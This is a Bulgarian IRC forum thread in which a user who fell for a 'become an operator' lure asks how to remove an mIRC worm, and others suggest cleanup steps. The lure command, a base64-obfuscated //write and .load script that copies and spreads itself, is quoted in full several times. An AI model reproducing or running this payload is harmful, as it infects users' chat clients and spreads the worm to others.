Jump to content
BulForum.com

Mirc Problem

bg_korn2005

Recommended Posts

Pyrvo iskam da kaja che ako tazi tema e ima nqkyde se izvinqvam specialno na adminite i moderatorite za tova

A vyprosa mi e sledniqt

Dokato chatih v Mirc mi doide edno takova saobshtenie:

Ako iskash da stanesh operator v Plovdiv copy/paste tova

//write . $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpv

aW4gI0JveXMmR2lybHMgfCAubXNnICRuaWNrIElza2FzaCBsaSBkYSBieWRlc2ggT3BlcmF0b3IgdiAk

Y

2hhbiA/IGNvcHkvcGFzdGUgVG93YS0+AzcgLy93cml0ZSCgLqAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJl

YWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAuoCAkY2hyKDEyNCkg

L

y9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs . |

i az nali sym si shmatka vzeh che opitah :( :( :(

sega sa mi bannali neshto i imam nqkyv virus

molq nqkoi ako moje da mi kaje kak da gi mahna tiq chudesii za da moga da chatq otnovo

Pyrvo iskam da kaja che ako tazi tema e ima nqkyde se izvinqvam specialno na adminite i moderatorite za tova

A vyprosa mi e sledniqt

//write  .  $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpv

aW4gI0JveXMmR2lybHMgfCAubXNnICRuaWNrIElza2FzaCBsaSBkYSBieWRlc2ggT3BlcmF0b3IgdiAk

Y

2hhbiA/IGNvcHkvcGFzdGUgVG93YS0+AzcgLy93cml0ZSCgLqAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJl

YWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAuoCAkY2hyKDEyNCkg

L

y9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs  .  |

i az nali sym si shmatka vzeh che opitah :(  :(  :(

molq nqkoi ako moje da mi kaje kak da gi mahna tiq chudesii za da moga da chatq otnovo

1.Какав е вирус-а?

2.Бан-а ако е пернаментен няма махане :devil

3.Използвай "Search"

Тва е най-голямата простотия да отваряш сайтовете и нещата, които се пращат като реклами. Всичко до 1 е вирус

Особено когато непознат ти каже че ще те направи оперетор на канал ;)

a tova govori li vi neshto

Baned: Imate VIRUS! Iskali ste da stanete operator v nyakoj kanal. Prochetete instrukcii kak da si mahnete virusa na tozi adres (2005/08/13 17.59)

znachi po nqkakvyv nachin tova chudo ima mahane

kajete mi kak tochno da go mahna shtoto nerazbiram :rolleyes:

a tova govori li vi neshto

Baned: Imate VIRUS! Iskali ste da stanete operator v nyakoj kanal. Prochetete instrukcii kak da si mahnete virusa na tozi adres (2005/08/13 17.59)

znachi po nqkakvyv nachin tova chudo ima mahane

kajete mi kak tochno da go mahna shtoto nerazbiram :rolleyes:

Най-вероятно това е базик ;).Сканирай с Нортан или нещо подобно ;)

Не е базик щом си пейстнал тва за да станеш оператор, си се заразил с вирус

Разрешение: Преинсталираш си скрипта(мирката)

Не е базик щом си пейстнал тва за да станеш оператор, си се заразил с вирус

Разрешение: Преинсталираш си скрипта(мирката)

Нямаш си идея за какво говориш...Ако има вирус няма да е зле да сканира с анти-виросна програма за да види колко и кой файлове са заразени...В интернет е пално с такива тъпни и аз си мисля че няма да има вируси ;)...Ако вируса(ако има такав)е заразил не само мирка-та няма да се оправи само с реинстал на скрипта ;)

zna4i tova koeto si kopnal e kodiran nqkakyv kod.

V mirc v Status prozireca napi6i "/remote off" bez kavi4kite.

Probvai da se conectne6 i kaji dali o6te ima6 tozi problem.

Нямаш си идея за какво говориш...Ако има вирус няма да е зле да сканира с анти-виросна програма за да види колко и кой файлове са заразени...В интернет е пално с такива тъпни и аз си мисля че няма да има вируси ;)...Ако вируса(ако има такав)е заразил не само мирка-та няма да се оправи само с реинстал на скрипта ;)

Имал съм същия проблем, когато пейстнеш това за оператора се заразяваш и ти слагат G-line, оправя се с преинсталиране на скрипта, може и с /remote off да са оправи, ама не винаги става

• 3 months later...

Аз имам проблем в ИРЦ. Когато влезна в някакъв канал и топика е на БГ не ми го дава а го дава с някви йепоглифи.

A vyprosa mi e sledniqt

//write . $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpv

Y

L

y9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs . |

i az nali sym si shmatka vzeh che opitah :( :( :(

Значи пробвай по следния начин !

1. ънинстал мИРЦ

2. сканирай с антивира

3. инстал ново копие на мИРЦ

едит: Опс май нмаше нужда от тоя пост . :) сОрИ

Значи пробвай по следния начин !

1. ънинстал мИРЦ

2. сканирай с антивира

3. инстал ново копие на мИРЦ

едит: Опс май нмаше нужда от тоя пост . :) сОрИ

хаха и аз така са заблудих, добре че видях , че съм писал и първо много се учудих :lol:

Горе от менюто даваш на фонтс и от там даваш кирилица :P

Ми на тоя шпифт дет е подразбиране нестава нещо. Или ако стане ми променя шрифта. А аз не искам да го сменя.

Всичко изписано по темата е бълвоч и половина :D :wacko:

Въпросният "вирус" се съдържа в един файл в директорията на мирката..

файла се казва .&, спри мирката, изтрии файла, и си пускай пак мирката.. това е :rolleyes:

А това за йероглифите.. елементарно, скъпи ми Уорсън :P

Отиваш на View - Font, и там 'дето пише Script избираш Cyrilic.. И слагаш отметката долу на която пише "set as default.."

Това го правиш в някой канал. После във всеки следващ канал като влезеш всичко ще ти е 6.

Ако нямаш Script Cyrilic, тогава избери друг шрифт.. или просто инсталирай Windows-ските шрифтове с кирилицата :D

• 3 months later...

погледни ТУК (UNIBG).

изтрий си скрипта и след това си направи mrc фаел с командата кудето е пише в линк-а ! тази команда както ще прочетете там забранява да въвеждате кодове които започват с /write

Archived

This topic is now archived and is closed to further replies.

• Create New...